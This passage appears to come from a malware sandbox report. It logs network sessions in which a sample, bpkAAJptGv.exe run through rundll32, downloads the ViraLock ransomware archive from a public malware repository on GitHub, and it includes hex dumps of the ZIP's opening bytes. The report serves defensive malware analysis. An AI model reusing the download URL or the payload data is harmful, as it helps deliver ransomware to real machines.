                                                                                                                                                            2022-09-29 12:44:57 UTC3877INData Raw: f7 7d b1 8e a4 44 c6 24 13 02 73 ba df d0 95 eb 82 10 39 6a 16 cd e6 18 81 ce 11 eb 8d db c4 97 4d f9 e9 ae 8c 4e 98 59 14 39 1a f0 1a e6 fa 63 45 d5 1a 8f a5 05 91 00 26 3a 9a 07 95 46 54 bb e2 8a 32 24 5b 7a ec a3 5c 62 9b 85 48 d6 95 61 c1 3f e8 23 b8 ae 89 78 1c 4f 31 6c 95 36 2d bf 69 4d 18 e5 01 e6 c9 d2 a9 06 05 ff aa 46 93 ce b5 24 20 41 88 57 81 5f 7a ed f5 69 4e 47 31 55 1e d8 36 b1 c9 bb e5 1f f6 dc 3c c2 f6 5e 72 78 ee 80 1a 16 62 65 8a fd 6b 41 f7 fb 5e 60 d8 15 84 8b 1d df 73 fe 94 40 78 29 48 91 fc d1 0a 35 ef 5b b6 c2 fa ed 7d 79 d6 43 59 a9 1e 3a dd b1 71 dc d3 e6 55 91 a8 41 15 fc 40 e6 e0 76 bf a0 c5 5b c2 46 ea 73 0b 34 34 1a 24 31 a4 28 56 ab 02 96 87 1b 53 77 a1 94 e4 ed 68 cb dd cb 28 2e 05 7e 6e f8 d8 1e fe 4f d0 9b c0 85 cb f6 f5
                                                                                                                                                            Data Ascii: }D$s9jMNY9cE&:FT2$[z\bHa?#xO1l6-iMF$ AW_ziNG1U6<^rxbekA^`s@x)H5[}yCY:qUA@v[Fs44$1(VSwh(.~nO
                                                                                                                                                            2022-09-29 12:44:57 UTC3893INData Raw: 15 29 66 92 de 14 b3 85 c2 47 83 87 d7 2a 29 00 3e d7 4c ee 1d cc 03 b0 9c c6 3b fe 93 5b 7d d3 ce 1b cf ef 09 10 1b 08 2c a2 53 c3 de ed b4 ec 0a 67 46 d9 7d 36 0b c2 d6 5c 7a b8 d9 7c 95 60 76 ef 8e 9e 81 5c b7 c8 29 c7 84 fa 63 82 91 95 03 b8 13 94 62 65 4f 4b 46 80 fe bb 03 5d 64 01 72 88 36 27 a9 70 49 9b 21 65 9c d4 74 46 52 7e 6d 80 5f ba ba 7e 5b ef 78 69 32 0a de 28 bb 50 8f 0d 55 f1 57 ff 6e 70 5f 34 12 56 d9 13 35 e5 85 ab 32 78 a9 fa c4 e4 af 87 2a 63 e6 05 ee a2 8e 28 e6 70 5a 52 35 fc 8f 10 bc c3 60 b7 55 c6 12 af c9 58 5b 20 41 f3 1b 28 71 21 1f 76 82 39 e0 e2 72 11 a7 d7 1a 91 34 a1 1f 31 98 6b 7c 05 ff 17 e4 49 19 24 0a b1 6b 86 f7 13 56 79 e6 ab c8 47 cc 10 64 b4 d4 d2 f6 0e 35 0e 8d 01 8c 42 a5 9e f2 68 64 fa 42 e6 2b 53 ab 56 3d 96 a6
                                                                                                                                                            Data Ascii: )fG*)>L;[},SgF}6\z|`v\)cbeOKF]dr6'pI!etFR~m_~[xi2(PUWnp_4V52x*c(pZR5`UX[ A(q!v9r41k|I$kVyGd5BhdB+SV=
                                                                                                                                                            2022-09-29 12:44:57 UTC3904INData Raw: db 4d 9f ea 35 ae e5 89 e7 8f 3b 8b 67 a6 81 55 3c 72 bc f3 8c 7d 60 33 a5 5e 59 85 b5 d2 7d f1 2c aa c6 1d a2 fa ad 35 1f c9 5c 39 04 8c e7 26 e9 33 d0 49 2f a3 82 ee 2c a7 0d 5a 9e 16 ca 5f 93 ce a6 f3 e1 97 3b 75 28 be 67 c0 c2 ad 26 c8 b0 5b 41 12 6d d7 1f 29 dd f2 cc e1 cd 71 05 14 47 63 96 fd cc d9 43 a4 30 75 0c 82 69 51 43 83 c4 fc 22 d0 5e 87 a8 68 6a 10 28 8e ba a2 13 93 77 ec fd 92 c4 cd ea 24 7d 7d 26 7f ba 79 33 97 f1 cb 2b e0 ed af 8f da e9 89 7c 25 9b 55 be 49 b5 2b 56 6c fd 1c 76 2c f3 de c7 4d 5f f9 cc e1 c9 ba 8a 14 97 7f 08 c1 f8 81 4d 03 2c 10 24 ec 84 6b e5 ec fb 80 55 d7 d8 f5 93 c2 c9 e6 7e cd 14 08 a4 e2 79 e2 19 84 b1 b9 15 11 01 c0 7d d5 75 5f 63 57 19 e8 b5 ac 27 a4 16 5c 99 dd 43 9e 13 49 b8 18 9f 59 31 aa 9d d1 53 2a 35 75 9f
                                                                                                                                                            Data Ascii: M5;gU<r}`3^Y},5\9&3I/,Z_;u(g&[Am)qGcC0uiQC"^hj(w$}}&y3+|%UI+Vlv,M_M,$kU~y}u_cW'\CIY1S*5u
                                                                                                                                                            2022-09-29 12:44:57 UTC3920INData Raw: 97 0a 23 da b5 14 67 97 0d 54 3b 4e 05 83 47 27 85 34 67 98 4d 78 e5 14 46 b6 71 2f 3a 91 4e 6d 5f b1 0e f5 d3 52 cd 7f c3 e5 7f b2 94 09 8f d0 71 91 cc 52 8a 4b 64 d2 f9 29 9a 23 6d fb bd 88 57 e3 8d c7 6b 1f ca 29 67 15 91 2f 89 2f af 9f 3e e2 41 de fd e7 bb d8 e9 d8 d1 1a 7c eb 87 64 a0 e9 43 8c 32 ba 04 15 61 b0 14 17 37 0b 3e 94 22 30 f3 f0 a3 af 13 c6 88 a9 11 19 1c 85 92 a9 6a ff 12 7c cd c4 fa 5c 34 59 0a c7 8e b1 af 91 51 99 a5 3a e1 4d 94 4c 6b 8e a1 79 f8 17 ea 8c 6b 89 f1 5b 14 3b cb e3 16 1a 32 40 56 6a 3c 09 54 88 a6 c4 8c ab 06 2c 9f 72 d7 5f 88 e0 c1 93 cb cc 99 54 5c d9 b5 f8 84 22 18 73 53 08 ae 7f 69 63 25 6f 63 86 4a f0 c8 57 aa d1 13 fc 4e 5b 88 14 09 22 34 8b 9f 38 9d 1c f5 2d 80 6f 66 bd 10 b1 f7 0f 84 f2 4b ac 0b 00 e9 6d aa 5a 0a
                                                                                                                                                            Data Ascii: #gT;NG'4gMxFq/:Nm_RqRKd)#mWk)g//>A|dC2a7>"0j|\4YQ:MLkyk[;2@Vj<T,r_T\"sSic%ocJWN["48-ofKmZ
                                                                                                                                                            2022-09-29 12:44:57 UTC3936INData Raw: fe 2a f4 7a 55 78 0f 29 64 3e 10 08 47 42 16 bc 27 50 94 27 cb 6d 16 b7 9c b7 7e 06 4d 78 2c 7d 07 5c f6 43 b2 72 f4 bf 16 c1 18 37 1c 61 d9 b1 8b 63 7d 41 8c 7c f4 90 a4 5b d1 9d 24 25 b1 cd 5e 7f 91 35 51 c9 40 ce 1b 1d cc 60 51 34 69 5a 86 dd 59 9f 39 da c2 fc 59 5b 9b 16 0e c6 2a 47 3d 99 77 fc 36 18 bc b8 11 48 69 9b 3f 37 be ec 69 f7 a9 aa ac 6c 73 64 0a 5a 61 85 ba d8 98 f2 40 3b a0 cc 63 da 91 54 38 00 ce 2f 29 4a 4d 96 1f 15 db f8 73 70 14 e6 c8 64 a9 d0 5e 58 e2 40 50 59 9f d6 9f db b2 6d 60 2e 01 1e 39 13 45 73 04 ed 06 d6 04 9f 22 dc 52 6a 87 d2 64 85 4d 75 c3 6f 17 58 da 20 97 45 46 00 d9 d7 c5 8a 46 dd dd 89 6c d1 9d 94 f3 b3 29 c2 c6 02 e2 15 f3 f4 e2 af 4d 7d 43 09 ee 49 ea 73 79 0c 6b 1a 22 eb 04 f1 16 5c c4 a8 30 e7 89 20 46 66 7a 5b fe
                                                                                                                                                            Data Ascii: *zUx)d>GB'P'm~Mx,}\Cr7ac}A|[$%^5Q@`Q4iZY9Y[*G=w6Hi?7ilsdZa@;cT8/)JMspd^X@PYm`.9Es"RjdMuoX EFFl)M}CIsyk"\0 Ffz[
                                                                                                                                                            2022-09-29 12:44:57 UTC3952INData Raw: c3 f6 ca 90 3f 35 02 23 23 b3 1f 45 e2 e8 9b 43 b3 ac 40 50 5a bc 3b 68 06 cf 96 a5 94 a2 a5 88 b4 da 79 f6 82 c1 73 2f fb d9 0a c0 65 f3 68 6f 90 ab 46 2b e1 c7 53 a6 66 0a 17 9f c1 da 3b 0a 51 d8 93 28 4e d1 8a e1 a9 3a aa b3 4d 21 34 07 1b 93 fe 2e e1 c3 22 23 88 49 95 4a 9f a7 51 29 00 3b 05 6c 00 c4 41 67 a2 5a ed ce d2 8d d8 df ed 9d 26 f1 62 e6 3c 32 8f 70 87 e6 c5 ee 0c 0b 64 06 41 42 8a 26 ff f7 4e 82 f5 8b a8 16 64 49 65 a4 23 13 b4 a6 cc ab f4 5a 57 4f 88 5a 9a dc 76 c0 f7 94 d8 c4 7b 07 aa 72 14 9c 69 23 97 53 ea b7 c0 3d 03 e9 be ff c9 da 99 63 07 1b a0 98 97 1a 4e d6 d2 f3 40 15 05 59 5b f7 a2 43 3b 82 25 f2 88 98 1c c5 67 39 90 63 00 fe 86 13 69 07 72 49 c5 8a 9a 21 24 6b 10 2a c9 4b bf 6d 30 5b a4 bc 39 a6 8c 4f f5 17 ed d8 b0 b2 17 a9 6d
                                                                                                                                                            Data Ascii: ?5##EC@PZ;hys/ehoF+Sf;Q(N:M!4."#IJQ);lAgZ&b<2pdAB&NdIe#ZWOZv{ri#S=cN@Y[C;%g9cirI!$k*Km0[9Om
                                                                                                                                                            2022-09-29 12:44:57 UTC3968INData Raw: a8 a2 f6 ce ed e2 57 97 b3 ff d0 54 2d 69 00 82 f8 16 79 33 d6 df 2a 97 9e 3f 06 a8 9a 84 0d e1 ef f9 53 09 0f 9f e3 22 3a 6c 86 9e d5 77 ef f6 50 55 8b 1b b1 81 15 4a e0 7d aa 94 2e d5 a8 a8 ab 5d 94 50 cf b4 b7 a9 8c f8 c7 99 44 61 88 fa 81 e6 6a 2b 0a c4 92 00 8a 4c 04 14 c2 bf 0d 00 be 28 a9 2c db ed fb f5 ab 98 77 1c 46 eb 62 e2 0a ed 8a aa 32 bb 1d d5 d7 6a b3 fc be 77 5f 9c 3b 14 cb 5d 66 04 e3 c0 09 df 8e f7 b6 17 40 96 da 73 05 2b 80 2a cb 14 41 33 7c 3d 84 a2 2b 6f 7a 20 01 25 aa 5b 41 8d a0 3c 78 0b 4a 61 e7 ea 36 dc 25 0e 1a 58 bc 34 1f c9 56 2b 3b 5f b1 ce 80 2c 79 9e c0 c7 aa 55 6d 6a 97 d0 e4 34 53 8b 1a a8 42 dd 37 f7 65 66 9d 06 01 47 1f 1a b1 e7 4a 89 9a 38 df b9 63 da 60 98 70 56 77 37 83 03 ea 81 10 71 ed ab 97 73 24 14 c4 a5 4b ab 5f
                                                                                                                                                            Data Ascii: WT-iy3*?S":lwPUJ}.]PDaj+L(,wFb2jw_;]f@s+*A3|=+oz %[A<xJa6%X4V+;_,yUmj4SB7efGJ8c`pVw7qs$K_
                                                                                                                                                            2022-09-29 12:44:57 UTC3984INData Raw: ae 3b 31 5c 8a eb 36 c8 d7 30 11 6d 48 75 bd 7e 96 b0 b5 47 8a c7 de 77 49 27 c2 06 ed 2e b2 5f 1e cd 4a d6 79 20 cd 3e 6b ec b5 df 0d fa 9a 98 7f 57 0f 50 7a 77 0f 17 f1 1e 14 f7 f2 1d 5f b5 e9 2a a8 78 77 82 9a cc e4 0f 68 4a 35 57 55 fa ff cb 4e 27 c9 b3 c3 64 78 df b4 13 3e 94 f2 3f 62 cd 99 8c d9 69 3f 22 8d 5d 54 ef 56 ed 25 1f dd be 36 df d5 7d 3b 55 15 49 0d 0f 8f 65 55 88 35 13 8b 56 55 bd 97 6a 97 a6 33 da aa 27 ae 55 48 44 c4 dd 48 0d be bb 6c fc 7c 43 63 26 72 d8 6f 3d 58 2e 0c 48 3e 75 8a 79 79 a3 aa e4 b3 79 2d 7b ff cf ff 9c 5a a3 b8 a3 99 71 62 0f 16 f5 1b 95 67 95 6d 32 77 1d 34 ce 94 a3 65 6a be d3 2d 92 60 ec 5b 71 31 9d 3b be a5 c2 0c 2b 71 ab 94 8e b6 9a 95 47 61 04 5a 0e 92 d0 dd da ab b6 75 5c 8b eb 33 cf f3 f8 8a 15 37 a7 29 76 e5
                                                                                                                                                            Data Ascii: ;1\60mHu~GwI'._Jy >kWPzw_*xwhJ5WUN'dx>?bi?"]TV%6};UIeU5VUj3'UHDHl|Cc&ro=X.H>uyyy-{Zqbgm2w4ej-`[q1;+qGaZu\37)v


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            46192.168.2.649731140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:58 UTC3986OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            47140.82.121.4443192.168.2.649731C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:58 UTC3986INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:58 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:58 UTC3986INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            48192.168.2.649732185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:58 UTC3988OUTGET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            49185.199.110.133443192.168.2.649732C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:58 UTC3988INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 135339
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "2bb1943793128dcdbc238f30e0779c2b1525b546f66d38117659df251eb89cab"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0866:0543:E4C3D7:F301C9:6335934A
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:58 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6964-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455499.524835,VS0,VE157
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: be8cfeb08ef1b69f7af54a364cfa55f382dacfbe
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:58 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:44:58 UTC3989INData Raw: 50 4b 03 04 33 00 01 00 63 00 0f 37 79 45 00 00 00 00 e1 0f 02 00 00 0a 03 00 17 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 56 69 72 61 4c 6f 63 6b 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 ed 91 64 e0 a1 85 e8 a0 cb 45 4a 4b c9 6b 96 10 99 81 2b 1d 24 3f e8 58 3b ea ca db e6 a4 67 1e 00 e6 fb 80 0f 17 9c a3 3e dc 6a 4f b1 b5 79 ab 70 3a f8 64 1e 80 04 fd 7e c9 a6 7f a7 8a ef 2e 9b 59 cf 79 88 93 ad eb 12 51 f7 b1 0b a9 8e 69 79 e7 f5 b5 5c 8d f8 f4 8e 7d ed ba 1d bb 09 e9 56 19 73 4c 01 8e 40 74 d0 0f f6 3c fe 84 b8 c1 61 75 90 6c 3d 69 a8 71 d5 f5 77 9d c7 2a dd 12 60 a5 7f 68 fe 61 bd b2 eb dd 1d c8 ea 09 9f 33 5c c7 30 80 6f 78 93 69 b5 0f e7 43 98 b4 66 ee 98 8f 3d 7f 45 8d ff f2 1f e4 3e f7 f0 41 99 10 92 0f 32 d0 58 da 23 e0 71 6d 6c 3e dc 81 d2
                                                                                                                                                            Data Ascii: PK3c7yEEndermanch@ViraLock.exeAEdEJKk+$?X;g>jOyp:d~.YyQiy\}VsL@t<aul=iqw*`ha3\0oxiCf=E>A2X#qml>
                                                                                                                                                            2022-09-29 12:44:58 UTC3990INData Raw: 56 99 97 ec dd bd c9 a3 1c 46 69 0b 2b 24 34 4e 0b 95 8d 76 2d 58 38 52 4f 20 39 99 6d 2a fe d0 2e b8 42 ae f9 10 88 74 73 e5 7e c0 cc 2b a4 98 19 69 f7 64 22 43 e6 74 04 9d 46 ee 4a 82 66 48 db 27 b3 d0 4e 61 71 84 d2 65 98 de f7 5d 9d d9 8c ba 63 f1 e8 c7 4f 45 f6 c1 a4 7d 68 bb 12 3d 5f 27 98 42 fa b8 56 e6 21 f2 41 3d ad 36 6b 59 db b9 60 ff 46 c9 41 42 bf df 11 72 49 30 c1 60 14 20 e8 d5 84 09 05 16 4f ec 06 24 80 86 3b 09 e5 7e 5a 08 0e 5b 76 48 8a 81 ba d0 f0 1c 0f d6 41 87 a9 d9 72 5d ad 99 8b cb 5f e0 05 9d 9c a2 54 df 32 a0 18 45 61 40 e4 c2 a5 1d 6e 77 72 79 19 39 e0 d8 99 17 54 8f 59 02 5b 4f 4e 23 68 38 6c 26 bd e8 97 be 3b a6 67 d5 5b 6a d7 81 45 31 54 6e 37 ea 4e f3 94 f9 36 f7 d5 a1 a7 f6 2f e6 77 08 ff 66 3d 3f b3 f9 8f d6 8d 7f bc ce cf
                                                                                                                                                            Data Ascii: VFi+$4Nv-X8RO 9m*.Bts~+id"CtFJfH'Naqe]cOE}h=_'BV!A=6kY`FABrI0` O$;~Z[vHAr]_T2Ea@nwry9TY[ON#h8l&;g[jE1Tn7N6/wf=?
                                                                                                                                                            2022-09-29 12:44:58 UTC3992INData Raw: f5 73 f7 5c 0a cf 7b f3 16 2b 3a ca 21 e5 d8 44 4d 88 72 d9 39 ef 8c 05 81 05 d0 b8 b8 70 fc 06 3f a1 66 dd 29 a5 e0 e5 ba d0 89 55 f1 a0 52 87 db 6d ef 02 c1 ab ae 21 fd e6 b6 3e b5 44 30 3b 1a 8e c7 11 7d b8 81 c2 99 2f 5a 35 40 27 51 3b da e6 23 68 49 2d fd 4d 8e 28 66 31 51 f2 31 71 84 89 1c 12 69 99 41 c2 54 69 52 75 ad e1 f2 4d d7 22 25 7a f5 2d 4b e3 35 d0 89 fe 11 eb 7a b3 3e 0f f5 08 85 55 ed e0 ec 23 ab e3 d5 25 ce 18 e6 f3 ae fb 59 25 c3 4d 50 61 b8 7a 3b 59 58 f6 26 6b f0 2c bf c1 cb 44 25 93 e1 87 7e 17 ad 8f 2c fd 51 14 22 7f dd 65 5c 48 cc 50 73 0e da 12 ca 38 78 0e bb de 2a 2f 3b b1 1f ba 3f 2a f8 a7 5d 74 7e e0 f1 43 a4 f8 81 67 92 4a d6 f4 53 67 b8 07 ba e6 10 ef 45 cc 7a db f2 72 ed fb b7 f9 fd 0c 25 9d 33 94 81 7b 81 d5 39 9d f9 06 78
                                                                                                                                                            Data Ascii: s\{+:!DMr9p?f)URm!>D0;}/Z5@'Q;#hI-M(f1Q1qiATiRuM"%z-K5z>U#%Y%MPaz;YX&k,D%~,Q"e\HPs8x*/;?*]t~CgJSgEzr%3{9x
                                                                                                                                                            2022-09-29 12:44:58 UTC3993INData Raw: a9 4a 12 99 f3 8a cb b7 28 6e 50 53 e4 11 5f 97 cc da b7 72 1a d5 8a 6a 7a 06 ac 26 7c 38 6e da 6b 81 ee a4 5d 7d b9 8f 22 0e 32 0e 0c 36 7a 72 bc a6 8a 22 4e de 4f 02 d4 31 61 57 64 4c 4e a3 8b 1e 1e 5e ae 58 9a 5f 6e 7f 57 77 5b 77 5a 83 9f ba ed 15 c0 45 23 4b 32 9e 7f 5d 61 b7 ac 02 5c d2 a2 8d 38 6e 67 f8 81 6d cc b9 d7 a3 08 a2 28 7f b9 32 c7 4d 90 00 b5 46 1e 92 10 74 ee ea f7 d2 e0 b4 96 50 e2 f9 a5 8a c2 83 6c b9 d9 82 06 97 b5 2d 74 1a 5d 38 f4 f8 40 d5 77 4c 2b 6c be 2a e9 58 a0 a5 a8 73 10 09 52 e2 8f e6 e9 d1 d0 eb 37 59 66 56 73 57 c4 08 64 c7 0b c7 2a 4f 3b 38 2f 56 2d ab fc 23 6c 69 38 83 7b 66 d1 9b a9 61 79 65 1b 8d 80 0f 48 27 0d 20 55 da c1 84 9f 41 1a 06 17 13 10 47 ce 44 30 5a 89 be 1c 70 d9 52 44 62 6d ae a7 f9 88 c8 a5 84 e8 d1 0b
                                                                                                                                                            Data Ascii: J(nPS_rjz&|8nk]}"26zr"NO1aWdLN^X_nWw[wZE#K2]a\8ngm(2MFtPl-t]8@wL+l*XsR7YfVsWd*O;8/V-#li8{fayeH' UAGD0ZpRDbm
                                                                                                                                                            2022-09-29 12:44:58 UTC3994INData Raw: 4f d7 0a 1b 04 ac 66 0d c3 85 da 2a eb 77 91 f3 ed f7 69 36 47 c1 be 9d d1 94 34 8c a3 a1 8b f5 c8 14 aa 5d c7 5b 5e f8 2f 16 1b ea 66 fa d6 17 5d d3 f4 29 09 b2 17 58 de 34 ab 64 49 6a d4 7f 36 a9 8e bf 21 1d 6e 32 a6 72 9a ae ee 95 5e 4a 7e fa 43 43 fa ca ab 2f 18 03 83 db bc ac 67 3e e6 b6 67 4d 20 d9 d9 3d e2 48 c3 e6 dc 59 6e f0 53 93 43 d0 f4 fe 25 04 76 55 69 88 11 ea 1d 1a a6 b5 50 32 bc 7f 26 58 29 66 ae b6 23 b9 f9 d4 20 6c 4f ed 06 0c 55 70 4b d1 a4 93 06 52 d3 25 c2 8b df 82 03 62 c7 a7 48 3d 65 cd 19 49 0d d7 4f cc f8 6e 9f 4e 22 a1 d6 a7 fd ff 63 f6 05 72 9d f5 20 55 ae a9 57 c1 f8 b8 5c 39 25 2a da 4e b5 c0 93 b6 cd f4 6b 7f 73 cd 39 00 dd c3 4f 24 6a 8d 82 f9 e1 e1 46 52 59 9f 3d d1 a1 47 ee f6 13 d8 bf 99 7b 62 f0 c2 ee a3 c3 88 a5 96 15
                                                                                                                                                            Data Ascii: Of*wi6G4][^/f])X4dIj6!n2r^J~CC/g>gM =HYnSC%vUiP2&X)f# lOUpKR%bH=eIOnN"cr UW\9%*Nks9O$jFRY=G{b
                                                                                                                                                            2022-09-29 12:44:58 UTC3996INData Raw: b1 b7 0d a1 61 43 b3 3c 2e a4 3c 30 97 9d a3 a2 7d 91 39 d1 27 75 43 96 47 5c 9b 94 47 c7 cf b2 f5 86 e8 63 e2 4c 1d af 4a 88 a5 23 82 12 c1 05 f4 d6 5b 51 88 c1 ea 55 13 f3 1d 18 bd 6e 2d ce dc 2a 98 03 0d cf 06 f9 de 9c 5d 8b 7d fe 23 20 86 a6 e5 ff 27 a7 76 75 90 10 c3 86 a8 23 20 9f d2 90 de 20 2a d5 6e e4 a0 79 cf 44 db 71 23 7c b7 98 3f 26 a1 92 41 42 6c cb 1b ed b5 ec 4b 28 14 62 35 97 c8 00 96 e3 2b 62 a9 a0 88 f3 b7 a3 f5 5c e4 f3 8f 6a 5e 8e 33 32 64 47 a2 e7 6f b8 ae 65 16 29 f2 df 79 ce d3 fe 0a 86 67 5d 04 de 70 c4 64 ec 40 bb c6 c1 1d 0e 01 d9 50 d1 4c d5 c3 20 19 63 45 31 06 96 5a 71 58 82 a4 81 ce 3a 6d e2 1b 10 eb 96 f0 78 65 df 8e fc 19 28 15 07 13 cb 38 67 7e 53 19 6e 63 9b cd ce ea de 0e 8b a2 46 55 10 38 77 ec 9c 29 c1 26 37 c9 7f 1e
                                                                                                                                                            Data Ascii: aC<.<0}9'uCG\GcLJ#[QUn-*]}# 'vu# *nyDq#|?&ABlK(b5+b\j^32dGoe)yg]pd@PL cE1ZqX:mxe(8g~SncFU8w)&7
                                                                                                                                                            2022-09-29 12:44:58 UTC3997INData Raw: 27 24 03 14 58 3a d2 bd c3 99 3f ae 30 8f 8c e2 54 75 ff 76 74 c6 fa 9c 05 49 bc fe b4 15 13 25 3a 5d 8c 4a e2 77 2f a1 e0 72 76 77 58 df 21 9a a7 99 1d f4 b8 be 3c 43 1d d0 2f cc fd 3e 34 d3 fc 2f 05 b2 e6 5e 3d 6e 18 7d 4d 8e 98 19 aa b3 42 80 b8 22 2c cb d7 82 a2 3d 41 e0 96 19 fa 90 8e 91 56 bb 3c b4 24 65 87 2e a7 3d 6e 25 9d 57 e7 4b 7e 68 be 8a 3c a0 4b 61 62 2a ea 10 d5 e2 03 60 d5 9a c3 36 fd 74 05 6c bd 23 a8 39 2c 78 5b 01 c2 74 db 03 78 26 34 1d b8 ad 34 7d 1c 92 10 8c 1b 96 f5 04 4c f5 4f 51 c8 19 78 47 8c 29 ff 88 cb ee 67 87 fd 4c a8 58 f5 5c 7d 14 24 cc 8a 79 ee a7 aa a0 31 a0 56 a3 c1 5c 26 64 7a 82 86 d8 dd 24 66 55 8f 4d dd ac fb 12 67 9f ca ac f5 52 7d 40 c7 a7 ab d5 26 98 77 e6 c4 ef 5d b7 36 83 8e 4c 1c 6e 4f b3 80 e8 9e 26 74 8a 2a
                                                                                                                                                            Data Ascii: '$X:?0TuvtI%:]Jw/rvwX!<C/>4/^=n}MB",=AV<$e.=n%WK~h<Kab*`6tl#9,x[tx&44}LOQxG)gLX\}$y1V\&dz$fUMgR}@&w]6LnO&t*
                                                                                                                                                            2022-09-29 12:44:58 UTC3998INData Raw: 08 4d 6b b0 06 1c 14 79 60 fe cc 58 9a 14 9c 55 df fa fb 33 18 96 e2 0d 76 d1 bd f5 01 9a 6f 0f a0 18 c8 f9 48 63 c1 ad 20 5f 3e 10 b9 34 cb d6 b4 55 64 e0 c2 4d 58 83 81 6b b5 7d d7 26 b7 1a a8 4d 79 49 3f c1 8a 59 a4 7d 61 9d 13 53 46 dc 7e 82 bb cc 25 9f 82 a0 3c ba 71 e2 ad 43 30 cf f3 7c d0 8f 38 ae b3 e6 24 47 6d e6 99 92 33 68 a3 9c db 6a f3 24 96 f7 76 5a 48 7e 06 be 7f dd 93 e1 98 78 c4 bf 03 0b 99 bf 8b 3b dd 7e 5a 98 58 ef 28 a2 5c e3 87 1d ea 2e fe 9d 64 b3 54 30 83 b4 40 24 7b 15 75 c3 52 f5 e0 fc b2 19 6f e2 46 60 e8 73 04 01 03 f9 6f 4d 47 3d d1 42 18 62 94 e5 5a ec 2f db d2 68 4f f6 17 3e b2 cf 69 64 9e f2 ec 43 85 12 e2 8c d6 fb 32 71 42 4b 1f 6e 49 bb 30 8f 7a 9c 63 b7 3d 1f 23 32 a0 e2 b3 a4 71 1d 9b 75 b0 b8 ca 68 25 7c d5 30 27 40 ad
                                                                                                                                                            Data Ascii: Mky`XU3voHc _>4UdMXk}&MyI?Y}aSF~%<qC0|8$Gm3hj$vZH~x;~ZX(\.dT0@${uRoF`soMG=BbZ/hO>idC2qBKnI0zc=#2quh%|0'@
